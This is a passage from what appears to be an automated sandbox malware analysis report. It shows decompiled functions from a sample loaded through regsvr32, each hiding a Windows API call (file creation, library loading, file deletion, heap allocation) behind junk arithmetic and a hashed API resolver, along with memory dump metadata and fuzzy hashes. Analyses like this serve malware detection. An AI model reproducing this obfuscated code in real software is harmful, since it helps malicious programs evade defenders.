				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E0048BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}










                                                                                                                0x0048bf24
                                                                                                                0x0048bf29
                                                                                                                0x0048bf2b
                                                                                                                0x0048bf2e
                                                                                                                0x0048bf2f
                                                                                                                0x0048bf30
                                                                                                                0x0048bf33
                                                                                                                0x0048bf36
                                                                                                                0x0048bf39
                                                                                                                0x0048bf3c
                                                                                                                0x0048bf3f
                                                                                                                0x0048bf42
                                                                                                                0x0048bf43
                                                                                                                0x0048bf44
                                                                                                                0x0048bf49
                                                                                                                0x0048bf53
                                                                                                                0x0048bf5a
                                                                                                                0x0048bf61
                                                                                                                0x0048bf68
                                                                                                                0x0048bf6c
                                                                                                                0x0048bf70
                                                                                                                0x0048bf77
                                                                                                                0x0048bf7e
                                                                                                                0x0048bf85
                                                                                                                0x0048bf9c
                                                                                                                0x0048bfa4
                                                                                                                0x0048bfab
                                                                                                                0x0048bfb2
                                                                                                                0x0048bfb6
                                                                                                                0x0048bfba
                                                                                                                0x0048bfbe
                                                                                                                0x0048bfd1
                                                                                                                0x0048bfe8
                                                                                                                0x0048bfef

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0048BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 0f8cd2037145af0413b987559e1755a2baf601c35c4f2b4e8f2d339172943c75
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: D421057280020DBBCF15DF96C9098DFBFB5FB84748F008198F925A2220D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00481B22 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00481B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00479E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E0048BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}












                                                                                                                0x00481b2a
                                                                                                                0x00481b2d
                                                                                                                0x00481b2f
                                                                                                                0x00481b31
                                                                                                                0x00481b34
                                                                                                                0x00481b37
                                                                                                                0x00481b3a
                                                                                                                0x00481b3b
                                                                                                                0x00481b3c
                                                                                                                0x00481b41
                                                                                                                0x00481b50
                                                                                                                0x00481b54
                                                                                                                0x00481b61
                                                                                                                0x00481b64
                                                                                                                0x00481b6b
                                                                                                                0x00481b72
                                                                                                                0x00481b79
                                                                                                                0x00481b7d
                                                                                                                0x00481b84
                                                                                                                0x00481b8b
                                                                                                                0x00481b92
                                                                                                                0x00481b99
                                                                                                                0x00481ba0
                                                                                                                0x00481ba7
                                                                                                                0x00481bae
                                                                                                                0x00481bc2
                                                                                                                0x00481bc5
                                                                                                                0x00481bd8
                                                                                                                0x00481be5
                                                                                                                0x00481bec

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00481BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: 941a434d605e3301395054229e45974a89da03b59ce573fe712cc76169e10522
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: F22132B5D00208FBDF05DFA5C94A8EEBBB5FB80314F10848AE914A6261D3B45B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004866C2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E004866C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E00479E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E0048BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}











                                                                                                                0x004866cf
                                                                                                                0x004866e4
                                                                                                                0x004866e9
                                                                                                                0x004866f3
                                                                                                                0x004866f7
                                                                                                                0x004866fe
                                                                                                                0x00486705
                                                                                                                0x0048670c
                                                                                                                0x00486710
                                                                                                                0x00486717
                                                                                                                0x0048671e
                                                                                                                0x00486725
                                                                                                                0x00486729
                                                                                                                0x0048672d
                                                                                                                0x00486734
                                                                                                                0x0048673b
                                                                                                                0x00486742
                                                                                                                0x00486766
                                                                                                                0x00486777
                                                                                                                0x0048677e

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00486777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 15db0576f14ac10faca90b9c37d6a4f62c36a04be1d9b6a9fe16f7bf63da4208
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 841144B2800208FBCF15DF95CC0A8DEBFB8EF95308F108198E92962210D3B58A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0047FCB5 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0047FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00479E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E0048BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}












                                                                                                                0x0047fcbc
                                                                                                                0x0047fcbf
                                                                                                                0x0047fcc1
                                                                                                                0x0047fcc3
                                                                                                                0x0047fcc8
                                                                                                                0x0047fcd6
                                                                                                                0x0047fcdb
                                                                                                                0x0047fce0
                                                                                                                0x0047fce7
                                                                                                                0x0047fcee
                                                                                                                0x0047fcf5
                                                                                                                0x0047fcfc
                                                                                                                0x0047fd03
                                                                                                                0x0047fd0d
                                                                                                                0x0047fd13
                                                                                                                0x0047fd16
                                                                                                                0x0047fd1d
                                                                                                                0x0047fd24
                                                                                                                0x0047fd2b
                                                                                                                0x0047fd4f
                                                                                                                0x0047fd58
                                                                                                                0x0047fd5e

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0047FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: e648a7df2eb7d4e51e93d0b8cecb14ad259e342187a7125b8cbcae11588e336f
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 39112E71D00218EBDB18DFA5C84A8EEBBB5EB44308F10C58DE529A6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00479EA8 Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00479EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00479E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E0048BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}










                                                                                                                0x00479eaf
                                                                                                                0x00479eb2
                                                                                                                0x00479eb4
                                                                                                                0x00479eb8
                                                                                                                0x00479eb9
                                                                                                                0x00479ebe
                                                                                                                0x00479ec8
                                                                                                                0x00479ecf
                                                                                                                0x00479ed6
                                                                                                                0x00479edd
                                                                                                                0x00479ee1
                                                                                                                0x00479ee5
                                                                                                                0x00479eec
                                                                                                                0x00479ef3
                                                                                                                0x00479efa
                                                                                                                0x00479f01
                                                                                                                0x00479f08
                                                                                                                0x00479f0f
                                                                                                                0x00479f16
                                                                                                                0x00479f1d
                                                                                                                0x00479f24
                                                                                                                0x00479f48
                                                                                                                0x00479f51
                                                                                                                0x00479f57

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00479F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: c54df2c260711c14d493594267913c6cc6753dcc93b9580f272c6ce2e4e98e89
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: 341148B1C01219EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7B41B148F95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0047BA9C Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0047BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E0048BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}








                                                                                                                0x0047baa2
                                                                                                                0x0047baa9
                                                                                                                0x0047baad
                                                                                                                0x0047bab4
                                                                                                                0x0047babb
                                                                                                                0x0047babf
                                                                                                                0x0047bac6
                                                                                                                0x0047bacd
                                                                                                                0x0047bad4
                                                                                                                0x0047badb
                                                                                                                0x0047bae6
                                                                                                                0x0047baee
                                                                                                                0x0047baf6
                                                                                                                0x0047bafa
                                                                                                                0x0047bb12
                                                                                                                0x0047bb1d

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0047BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: 2f883274aac8a1d3a651d484edb0a9117643ae097bdff7acad312aaa3863e007
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: 16010475D1120CEB8B04DFA5CA4A9DEBBB4FF04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%